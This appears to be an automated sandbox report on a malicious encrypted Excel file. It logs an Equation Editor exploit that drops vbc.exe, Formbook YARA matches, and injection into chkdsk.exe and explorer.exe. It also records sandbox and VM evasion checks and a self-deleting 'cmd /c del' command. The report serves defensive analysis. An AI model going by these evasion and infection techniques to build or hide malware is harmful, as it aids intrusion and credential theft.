Source: C:\Users\Public\vbc.exe	Code function: 6_2_0088286D	6_2_0088286D
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0090098E	6_2_0090098E
Source: C:\Users\Public\vbc.exe	Code function: 6_2_008629B2	6_2_008629B2
Source: C:\Users\Public\vbc.exe	Code function: 6_2_008769FE	6_2_008769FE
Source: C:\Users\Public\vbc.exe	Code function: 6_2_008E394B	6_2_008E394B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_008E5955	6_2_008E5955
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00913A83	6_2_00913A83
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0090CBA4	6_2_0090CBA4
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0085FBD7	6_2_0085FBD7
Source: C:\Users\Public\vbc.exe	Code function: 6_2_008EDBDA	6_2_008EDBDA
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00887B00	6_2_00887B00
Source: C:\Users\Public\vbc.exe	Code function: 6_2_008FFDDD	6_2_008FFDDD
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00890D3B	6_2_00890D3B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0086CD5B	6_2_0086CD5B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00892E2F	6_2_00892E2F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0087EE4C	6_2_0087EE4C
Source: C:\Users\Public\vbc.exe	Code function: 6_2_008FCFB1	6_2_008FCFB1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_008D2FDC	6_2_008D2FDC
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00870F3F	6_2_00870F3F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0088DF7C	6_2_0088DF7C
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_02621238	8_2_02621238
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_0257E2E9	8_2_0257E2E9
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_02587353	8_2_02587353
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_025CA37B	8_2_025CA37B
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_02582305	8_2_02582305
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_025A63DB	8_2_025A63DB
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_0257F3CF	8_2_0257F3CF
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_0259905A	8_2_0259905A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_02583040	8_2_02583040
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_025AD005	8_2_025AD005
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_0257E0C6	8_2_0257E0C6
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_02622622	8_2_02622622
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_0258E6C1	8_2_0258E6C1
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_02584680	8_2_02584680
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_025B57C3	8_2_025B57C3
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_0258C7BC	8_2_0258C7BC
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_0260579A	8_2_0260579A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_025BD47D	8_2_025BD47D
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_02591489	8_2_02591489
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_025B5485	8_2_025B5485
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_025C6540	8_2_025C6540
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_0258351F	8_2_0258351F
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_0259C5F0	8_2_0259C5F0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_02633A83	8_2_02633A83
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_025A7B00	8_2_025A7B00
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_0257FBD7	8_2_0257FBD7
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_0260DBDA	8_2_0260DBDA
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_0262CBA4	8_2_0262CBA4
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_0258C85C	8_2_0258C85C
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_025A286D	8_2_025A286D
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_0261F8EE	8_2_0261F8EE
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_02605955	8_2_02605955
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_025969FE	8_2_025969FE
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_025829B2	8_2_025829B2
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_0262098E	8_2_0262098E
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_0259EE4C	8_2_0259EE4C
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_025B2E2F	8_2_025B2E2F
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_025ADF7C	8_2_025ADF7C
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_02590F3F	8_2_02590F3F
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_0258CD5B	8_2_0258CD5B
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_025B0D3B	8_2_025B0D3B
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_0261FDDD	8_2_0261FDDD
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_0009B493	8_2_0009B493
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_00088C4C	8_2_00088C4C
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_00088C50	8_2_00088C50
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_0009CD28	8_2_0009CD28
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_00082D87	8_2_00082D87
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_00082D90	8_2_00082D90
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_0009CE77	8_2_0009CE77
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_00082FB0	8_2_00082FB0

Source: NEW 01 13 2021.xlsx

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: String function: 0257DF5C appears 118 times
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: String function: 0257E2A8 appears 38 times
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: String function: 025C373B appears 238 times
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: String function: 025EF970 appears 81 times
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: String function: 025C3F92 appears 108 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 0085E2A8 appears 38 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 008CF970 appears 84 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 008A373B appears 244 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 008A3F92 appears 132 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 0085DF5C appears 119 times

Source: 00000008.00000002.2370481869.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.2370481869.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.2370639916.0000000000260000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.2370639916.0000000000260000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.2220114080.0000000000190000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.2220114080.0000000000190000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.2370580381.00000000001A0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.2370580381.00000000001A0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.2175872234.00000000036B9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.2175872234.00000000036B9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.2220171178.0000000000350000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.2220171178.0000000000350000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.2220222146.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.2220222146.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: explorer.exe, 00000007.00000000.2182495093.0000000003C40000.00000002.00000001.sdmp

Binary or memory string: .VBPud<_

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSX@11/6@6/6

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$NEW 01 13 2021.xlsx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRFC87.tmp

Jump to behavior

Source: C:\Users\Public\vbc.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\Public\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: NEW 01 13 2021.xlsx	Virustotal: Detection: 29%
Source: NEW 01 13 2021.xlsx	ReversingLabs: Detection: 22%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: unknown	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: unknown	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: unknown	Process created: C:\Windows\SysWOW64\chkdsk.exe C:\Windows\SysWOW64\chkdsk.exe
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'	Jump to behavior

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\Public\vbc.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: NEW 01 13 2021.xlsx

Static file information: File size 1511936 > 1048576

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: chkdsk.pdb source: vbc.exe, 00000006.00000002.2220300365.000000000047D000.00000004.00000020.sdmp
Source:	Binary string: wntdll.pdb source: vbc.exe, chkdsk.exe

Source: NEW 01 13 2021.xlsx

Initial sample: OLE indicators vbamacros = False

Source: NEW 01 13 2021.xlsx

Initial sample: OLE indicators encrypted = True

Source: C:\Users\Public\vbc.exe	Code function: 4_2_003664FA push ebp; iretd	4_2_00366508
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0040C8B1 push ss; iretd	6_2_0040C8B5
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0041B3F2 push eax; ret	6_2_0041B3F8
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0041B3FB push eax; ret	6_2_0041B462
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0041B3A5 push eax; ret	6_2_0041B3F8
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0041B45C push eax; ret	6_2_0041B462
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00415CB8 push esi; ret	6_2_00415CB9
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0041A5F2 push cs; retf	6_2_0041A5F3
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0085DFA1 push ecx; ret	6_2_0085DFB4
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_0257DFA1 push ecx; ret	8_2_0257DFB4
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_0009B3A5 push eax; ret	8_2_0009B3F8
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_0009B3FB push eax; ret	8_2_0009B462
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_0009B3F2 push eax; ret	8_2_0009B3F8
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_0009B45C push eax; ret	8_2_0009B462
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_0009A5F2 push cs; retf	8_2_0009A5F3
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_0008C8B1 push ss; iretd	8_2_0008C8B5
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_00095CB8 push esi; ret	8_2_00095CB9

Source: initial sample

Static PE information: section name: .text entropy: 7.22615348682

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\file2[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Source: NEW 01 13 2021.xlsx

Stream path 'EncryptedPackage' entropy: 7.99984749113 (max. 8.0)

Malware Analysis System Evasion:

Yara detected AntiVM_3

Show sources

Source: Yara match	File source: 00000004.00000002.2175312527.00000000026B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 2812, type: MEMORY

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: vbc.exe, 00000004.00000002.2175312527.00000000026B1000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL
Source: vbc.exe, 00000004.00000002.2175312527.00000000026B1000.00000004.00000001.sdmp	Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\chkdsk.exe	RDTSC instruction interceptor: First address: 00000000000885E4 second address: 00000000000885EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\chkdsk.exe	RDTSC instruction interceptor: First address: 000000000008896E second address: 0000000000088974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\Public\vbc.exe

Code function: 6_2_004088A0 rdtsc

6_2_004088A0

Source: C:\Users\Public\vbc.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2344	Thread sleep time: -300000s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2796	Thread sleep time: -50634s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2876	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 504	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe TID: 3028	Thread sleep time: -34000s >= -30000s	Jump to behavior

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\chkdsk.exe	Last function: Thread delayed

Source: explorer.exe, 00000007.00000000.2191376878.00000000082FD000.00000004.00000001.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0y
Source: explorer.exe, 00000007.00000000.2183732159.0000000004234000.00000004.00000001.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: explorer.exe, 00000007.00000000.2176510697.00000000001F5000.00000004.00000020.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: vbc.exe, 00000004.00000002.2175312527.00000000026B1000.00000004.00000001.sdmp	Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000004.00000002.2175312527.00000000026B1000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: explorer.exe, 00000007.00000000.2183732159.0000000004234000.00000004.00000001.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: explorer.exe, 00000007.00000000.2191376878.00000000082FD000.00000004.00000001.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000PctiT
Source: explorer.exe, 00000007.00000000.2183732159.0000000004234000.00000004.00000001.sdmp	Binary or memory string: scsi\disk&ven_vmware&prod_virtual_disk\5&22be343f&0&000000
Source: explorer.exe, 00000007.00000000.2183637257.00000000041AD000.00000004.00000001.sdmp	Binary or memory string: ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0
Source: vbc.exe, 00000004.00000002.2175312527.00000000026B1000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: explorer.exe, 00000007.00000002.2370693082.0000000000231000.00000004.00000020.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
Source: vbc.exe, 00000004.00000002.2175312527.00000000026B1000.00000004.00000001.sdmp	Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools

Source: C:\Users\Public\vbc.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\Public\vbc.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\Public\vbc.exe

Code function: 6_2_004088A0 rdtsc

6_2_004088A0

